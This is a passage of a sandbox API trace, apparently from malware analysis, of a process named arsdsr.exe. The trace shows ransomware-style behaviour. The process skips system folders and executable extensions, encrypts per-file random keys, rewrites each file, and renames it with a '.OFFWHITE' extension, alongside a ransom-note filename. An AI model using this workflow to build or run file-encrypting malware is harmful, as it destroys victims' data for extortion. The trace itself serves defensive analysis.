lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.646] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3122, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.646] WriteFile (in: hFile=0x1e4, lpBuffer=0x522210*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522210*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.646] GetProcessHeap () returned 0x500000 [0143.646] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2f22) returned 0x55d7d0 [0143.646] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.646] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x2f22, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x2f22, lpOverlapped=0x0) returned 1 [0143.680] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.680] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x2f22, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x2f22, lpOverlapped=0x0) returned 1 [0143.680] GetProcessHeap () returned 0x500000 [0143.680] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0143.680] CloseHandle (hObject=0x1e4) returned 1 [0143.689] GetProcessHeap () returned 0x500000 [0143.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.689] GetProcessHeap () returned 0x500000 [0143.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.689] GetProcessHeap () returned 0x500000 [0143.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.689] GetProcessHeap () returned 0x500000 [0143.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.689] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" [0143.689] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.OFFWHITE" [0143.689] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.offwhite")) returned 1 [0143.690] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae2660aa, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae2660aa, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2=".") returned 1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="..") returned 1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="...") returned 1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="windows") returned -1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="$recycle.bin") returned 1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="rsa") returned -1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="ntuser.dat") returned -1 [0143.690] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="programdata") returned -1 [0143.691] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="appdata") returned 1 [0143.691] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="program files") returned -1 [0143.691] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="program files (x86)") returned -1 [0143.691] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.691] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_MKWD_AssetId.H1W" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" [0143.691] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.691] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.691] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".exe") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".log") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".cab") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".cmd") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".com") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".cpl") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".ini") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".dll") returned 1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".url") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".ttf") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".mp3") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".pif") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".mp4") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".OFFWHITE") returned -1 [0143.691] lstrcmpiW (lpString1=".H1W", lpString2=".msi") returned -1 [0143.691] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.692] GetProcessHeap () returned 0x500000 [0143.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522220 [0143.692] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.692] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=222716) returned 1 [0143.692] GetProcessHeap () returned 0x500000 [0143.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.692] GetProcessHeap () returned 0x500000 [0143.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.693] GetProcessHeap () returned 0x500000 [0143.693] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.693] GetProcessHeap () returned 0x500000 [0143.693] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.693] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.693] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.693] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.693] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.694] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x365fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.694] SetLastError (dwErrCode=0x0) [0143.694] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.696] GetLastError () returned 0x0 [0143.696] GetLastError () returned 0x0 [0143.696] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x366fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.697] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.697] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x367fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.697] WriteFile (in: hFile=0x1e4, lpBuffer=0x522220*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522220*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.697] GetProcessHeap () returned 0x500000 [0143.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x365fc) returned 0x55d7d0 [0143.697] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.697] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x365fc, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x365fc, lpOverlapped=0x0) returned 1 [0143.712] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.712] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x365fc, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x365fc, lpOverlapped=0x0) returned 1 [0143.713] GetProcessHeap () returned 0x500000 [0143.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0143.713] CloseHandle (hObject=0x1e4) returned 1 [0143.721] GetProcessHeap () returned 0x500000 [0143.721] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.721] GetProcessHeap () returned 0x500000 [0143.721] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.721] GetProcessHeap () returned 0x500000 [0143.721] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.721] GetProcessHeap () returned 0x500000 [0143.721] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.721] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" [0143.721] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.OFFWHITE" [0143.721] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.offwhite")) returned 1 [0143.722] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae409b6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae409b6f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2=".") returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="..") returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="...") returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="windows") returned -1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="$recycle.bin") returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="rsa") returned -1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="ntuser.dat") returned -1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="programdata") returned -1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="appdata") returned 1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="program files") returned -1 [0143.723] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="program files (x86)") returned -1 [0143.723] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.723] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_MKWD_BestBet.H1W" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" [0143.723] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.723] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.723] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".exe") returned 1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".log") returned -1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".cab") returned 1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".cmd") returned 1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".com") returned 1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".cpl") returned 1 [0143.723] lstrcmpiW (lpString1=".H1W", lpString2=".ini") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".dll") returned 1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".url") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".ttf") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".mp3") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".pif") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".mp4") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".OFFWHITE") returned -1 [0143.724] lstrcmpiW (lpString1=".H1W", lpString2=".msi") returned -1 [0143.724] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.724] GetProcessHeap () returned 0x500000 [0143.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522230 [0143.724] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.726] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=206316) returned 1 [0143.727] GetProcessHeap () returned 0x500000 [0143.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.727] GetProcessHeap () returned 0x500000 [0143.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.727] GetProcessHeap () returned 0x500000 [0143.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.727] GetProcessHeap () returned 0x500000 [0143.727] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.727] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.728] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.728] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.728] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.728] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.728] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.728] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x325ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.728] SetLastError (dwErrCode=0x0) [0143.728] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.733] GetLastError () returned 0x0 [0143.733] GetLastError () returned 0x0 [0143.733] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x326ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.733] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.733] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x327ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.733] WriteFile (in: hFile=0x1e4, lpBuffer=0x522230*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522230*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.733] GetProcessHeap () returned 0x500000 [0143.733] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x325ec) returned 0x55d7d0 [0143.733] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.733] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x325ec, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x325ec, lpOverlapped=0x0) returned 1 [0143.749] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.749] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x325ec, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x325ec, lpOverlapped=0x0) returned 1 [0143.750] GetProcessHeap () returned 0x500000 [0143.750] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0143.750] CloseHandle (hObject=0x1e4) returned 1 [0143.753] GetProcessHeap () returned 0x500000 [0143.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.753] GetProcessHeap () returned 0x500000 [0143.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.753] GetProcessHeap () returned 0x500000 [0143.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.753] GetProcessHeap () returned 0x500000 [0143.753] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.754] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" [0143.754] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.OFFWHITE" [0143.754] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.offwhite")) returned 1 [0143.755] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x79f1a, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".") returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="..") returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="...") returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="windows") returned -1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="$recycle.bin") returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="rsa") returned -1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="ntuser.dat") returned -1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="programdata") returned -1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="appdata") returned 1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="program files") returned -1 [0143.755] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="program files 